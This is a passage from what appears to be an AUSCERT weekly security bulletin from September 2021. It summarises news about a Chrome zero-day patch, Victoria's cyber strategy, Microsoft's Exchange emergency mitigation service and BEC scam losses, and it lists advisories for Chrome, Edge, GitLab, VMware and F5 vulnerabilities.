Lastly, we wanted to advise of some upcoming training that is being held in the last quarter of 2021, delivered remotely via Zoom. The courses will focus on Cyber Security Risk Management and Introduction to Cyber for IT Professionals. Dates and further information can be found on the online booking portal or by contacting us via email at training@auscert.org.au.

Emergency Google Chrome update fixes zero-day exploited in the wild
Date: 2021-09-24 Author: Bleeping Computer
Google has released Chrome 94.0.4606.61 for Windows, Mac, and Linux, an emergency update addressing a high-severity zero-day vulnerability exploited in the wild. “Google is aware that an exploit for CVE-2021-37973 exists in the wild,” the browser vendor revealed in Friday’s security advisory.

Victoria launches five-year, AU$50 million cyber strategy
Date: 2021-09-20 Author: ZDNet
The Victorian government has launched a new five-year cyber strategy that will see over AU$50 million allocated towards bolstering the state’s cybersecurity resilience. The cyber strategy will focus on three core missions that the government has described as providing safe and reliable delivery of government services, creating a cyber safe place, and creating a “vibrant” cyber economy. The strategy will be implemented through the state’s chief information security officer releasing annual mission delivery plans that outline specific activities associated with the three core missions. The CISO will develop this plan in consultation with relevant stakeholders across government, industry, and the community.

Microsoft adds novel feature to Exchange servers to allow it to deploy emergency temporary fixes
Date: 2021-09-27 Author: The Record
Microsoft will soon roll out a new security feature for its Exchange email servers, which have been at the center of several hacking campaigns over the past two years. Called the Microsoft Exchange Emergency Mitigation service, the new feature works by automatically installing temporary mitigations that block active exploitation of security flaws until Microsoft is ready to release official patches. The Emergency Mitigation service will be enabled by default for all Exchange servers once they install the September 2021 Cumulative Updates for Exchange servers, which are shipping out soon, after Microsoft delayed their release last week to have more time to work on the feature.

Wide-ranging BEC scam underscores dangers of doing business with (un)trusted suppliers
Date: 2021-09-27 Author: SC Media
Such schemes, referred to as “business email compromise,” often don’t get nearly the amount of attention or public awareness as ransomware and other forms of cybercrime, but the cumulative losses to businesses and individuals every year often dwarf what is seen in almost all other areas of digital crime. According to the latest annual internet crime report from the FBI, these schemes helped fuel a record number of complaints reported to authorities by the American public in 2020, with 19,369 complaints and adjusted losses of $1.8 billion attributed to BEC schemes alone.

Govt cyber incident intervention powers likely to be rushed in
Date: 2021-09-30 Author: iTnews
‘Last resort’ powers that would allow the government to intervene to contain a cyber attack on critical infrastructure should be “swiftly legislated”, a parliamentary committee says.

ESB-2021.3226 – ALERT Google Chrome: Execute arbitrary code/commands – Remote with user interaction
Google has released Chrome updates to fix an actively exploited zero-day vulnerability tracked as CVE-2021-37973.

ASB-2021.0187 – Microsoft Edge (Chromium-based): Multiple vulnerabilities
Microsoft last week rolled out updates for its Chromium-based Edge browser addressing multiple vulnerabilities, including the zero-day CVE-2021-37973.

ESB-2021.3214 – Traffix SDC: Denial of service – Remote/unauthenticated
F5 is yet to release a fix for Traffix SDC to address a use-after-free vulnerability in glibc.

ESB-2021.3262 – GitLab Community Edition and GitLab Enterprise Edition: Multiple vulnerabilities
GitLab addresses numerous vulnerabilities in its latest security release, including stored XSS, DNS rebinding, and several permission issues.

ESB-2021.3162.2 – UPDATE ALERT VMware vCenter Server & Cloud Foundation: Multiple vulnerabilities
VMware has updated its security advisory to confirm that CVE-2021-22005 is being exploited in the wild.

Stay safe, stay patched and have a good weekend!
The AUSCERT team
